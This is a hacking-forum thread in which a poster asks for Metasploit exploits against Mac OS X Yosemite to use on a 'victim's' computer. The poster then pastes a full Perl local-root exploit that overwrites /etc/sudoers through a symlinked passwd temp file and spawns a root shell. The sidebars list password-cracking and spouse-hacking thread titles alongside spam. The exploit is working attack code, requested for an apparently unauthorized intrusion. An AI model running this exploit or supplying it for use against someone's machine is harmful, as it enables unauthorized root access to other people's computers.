Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
How to Train to Be an IT Security Professional (Ethical Hacker)
25
Replies
2 hrs ago -
Forum Thread:
Hack Cheating Wife's Windows 7 Admin Password
15
Replies
2 hrs ago -
Forum Thread:
Krygen XL Throb Oneself of a Genuine
0
Replies
11 hrs ago -
Forum Thread:
www.highlife4man.com/keto-body-tone/
0
Replies
12 hrs ago -
Forum Thread:
Underscored Use of Yank Keeping Up a Key Division
0
Replies
13 hrs ago -
Forum Thread:
Spring Hall Health Keto Construct to an End
0
Replies
14 hrs ago -
Forum Thread:
LNG Active Male Enhancement Powerfull Male Enhancement for Men
0
Replies
15 hrs ago -
Forum Thread:
www.dietpillsrevolution.com/Wonder-Full-Keto/
0
Replies
16 hrs ago -
Forum Thread:
How to Hack Android Phone Using Same Wifi
18
Replies
20 hrs ago -
Forum Thread:
Need Help!!!
3
Replies
1 day ago -
Forum Thread:
How to Hack a Website to Edit It
18
Replies
1 day ago -
Forum Thread:
How to Hack Mobile Phone Using Termux Without Root | Metasploit Tutorial
0
Replies
1 day ago -
Forum Thread:
Everywhere to the to Annihilate
0
Replies
1 day ago -
Forum Thread:
Less lousy sustenance affinities are significant
0
Replies
1 day ago -
Forum Thread:
www.dietpillsrevolution.com/Keto-Fit-Denmark/
0
Replies
1 day ago -
Forum Thread:
Keto 10x Cumulate Here Far Wean Parts
0
Replies
1 day ago -
Forum Thread:
LNG Active
0
Replies
1 day ago -
Forum Thread:
Kali Linux in Android Phone Without Root
0
Replies
2 days ago -
Forum Thread:
How to Get My Router's Admin Password?
24
Replies
2 days ago -
Forum Thread:
How to Scan Websites and Get Admin Login Pannel | RED_HAWK Practical
0
Replies
2 days ago
-
How To:
Hunt Down Social Media Accounts by Usernames with Sherlock
-
How To:
Set Up Network Implants with a Cheap SBC (Single-Board Computer)
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
Raspberry Pi Alternatives:
10 Single-Board Computers Worthy of Hacking Projects Big & Small
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To:
Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To:
Get Unlimited Free Trials Using a "Real" Fake Credit Card Number
-
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
-
How To:
Top 10 Browser Extensions for Hackers & OSINT Researchers
-
Android for Hackers:
How to Turn an Android Phone into a Hacking Device Without Root
-
Hack Like a Pro:
How to Conduct a Simple Man-in-the-Middle Attack
-
How To:
Find Identifying Information from a Phone Number Using OSINT Tools
-
How To:
Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux
-
How to Hack Wi-Fi:
Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking Tools
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
How To:
Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+
-
How To:
Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack Using Airgeddon
-
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
-
Hack Like a Pro:
How to Hack Facebook (Facebook Password Extractor)
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts